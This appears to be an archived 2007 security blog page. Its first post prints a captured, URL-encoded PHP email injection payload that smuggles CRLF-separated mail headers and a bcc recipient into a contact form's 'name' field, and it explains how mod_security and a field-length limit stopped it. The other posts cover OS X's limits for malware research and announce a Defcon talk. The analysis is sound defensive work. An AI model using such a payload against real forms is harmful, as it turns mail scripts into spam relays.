Thursday, August 09, 2007
Sample PHP Email Injection from a real Attacker
This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)
---------------------------------------------------------------------------
Here is a php email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.
The attack wasn't successful for 2 reasons. First mod_security was used to block certain tell-tale signs of php email injection. The second reason is that the script limits the "name" field to a reasonable number which this attempt exceeded.
---------------------------------------------------------------------------
Here is a php email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.
The attack wasn't successful for 2 reasons. First mod_security was used to block certain tell-tale signs of php email injection. The second reason is that the script limits the "name" field to a reasonable number which this attempt exceeded.
text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0 %0ASubject%3A+to+himsilf%2C+a +habit+iv+dog%0Abcc%3A+charles es3229%40aol.com%0A%0AThis+is +a+mult
i-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b 3399a85a90%0AContent-Type%3A +text%2Fplain%3B+charset%3D %22us-ascii%22%0AMIME-Version %3A+1.0%0AC
ontent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto +s+visit%0A--3cde64db239a99d3c 03a2b3399a85a90--%0A%0D%0A.%0D %0A
Labels: php mail injection
Wednesday, August 08, 2007
4 Reasons OSX is not ready for Malware Research
I love my MacBook Pro. I really, really, really want it to be my primary research machine. Right now it sits between my Inspiron 9400 running Windows XP and my 5 year old clone running Fedora Core 6.
After 3 months of trying to use if for my research machine I'm resigned back to Windows and Linux. Mac OS X just doesn't have the right stuff for malware research.
Here's why I think it's not ready yet:
1) Networking - Lack of strong networking support in Virtualization products. I've tested both Parallels (2 and 3) and Vmware Fusion. Both support multiple virtual NICs and allow you to assign IP addresses. Both fail to offer the kernel level networking support of Linux tied into the virtual interfaces. For example on Linux I can use iptables on the host to restrict traffic on virtual interfaces. Not so with ipfw on OS X and Parallels. Also, where are the virtual networking config scripts for OS X?
2) Disk Image Support - Parallels offers an explorer tool that can view any type of image through a GUI. It works wonderful. It doesn't let me mount the disk in a way that allows systematic processing of the disk image. Vmware makes a nice virtual disk mount application for Linux and Windows but not OS X.
3) Headless support - Vmware offers headless support on both Windows and Linux which saves tons of time with 4 research machines. No need to sit in front of the machine running the VM to do simple GUI interactions. No such option for OS X.
4) Video capture - Vmware supports full screen video capture of guests on Linux and Windows but not OS X. Parallels does not offer video capture either. Sometimes a screenshot just isn't enough.
After 3 months of trying to use if for my research machine I'm resigned back to Windows and Linux. Mac OS X just doesn't have the right stuff for malware research.
Here's why I think it's not ready yet:
1) Networking - Lack of strong networking support in Virtualization products. I've tested both Parallels (2 and 3) and Vmware Fusion. Both support multiple virtual NICs and allow you to assign IP addresses. Both fail to offer the kernel level networking support of Linux tied into the virtual interfaces. For example on Linux I can use iptables on the host to restrict traffic on virtual interfaces. Not so with ipfw on OS X and Parallels. Also, where are the virtual networking config scripts for OS X?
2) Disk Image Support - Parallels offers an explorer tool that can view any type of image through a GUI. It works wonderful. It doesn't let me mount the disk in a way that allows systematic processing of the disk image. Vmware makes a nice virtual disk mount application for Linux and Windows but not OS X.
3) Headless support - Vmware offers headless support on both Windows and Linux which saves tons of time with 4 research machines. No need to sit in front of the machine running the VM to do simple GUI interactions. No such option for OS X.
4) Video capture - Vmware supports full screen video capture of guests on Linux and Windows but not OS X. Parallels does not offer video capture either. Sometimes a screenshot just isn't enough.
Tuesday, August 07, 2007
Defon 15 presentation now online
"Beyond Vulnerability Scanning - Extrusion and Exploitability Scanning" is now online at http://www.eescan.net/downloads/DC15.pdf.
Many thanks to all who attended. Please feel free to send any feedback to:
Many thanks to all who attended. Please feel free to send any feedback to:
Matt Richard - Extrusion and Exploitability Scanningor
mrichard@verisign.com
matt.richard@gmail.com
Fred Doyle - Risk Metrics
fdoyle@verisign.com
Labels: eescan
Subscribe to Posts [Atom]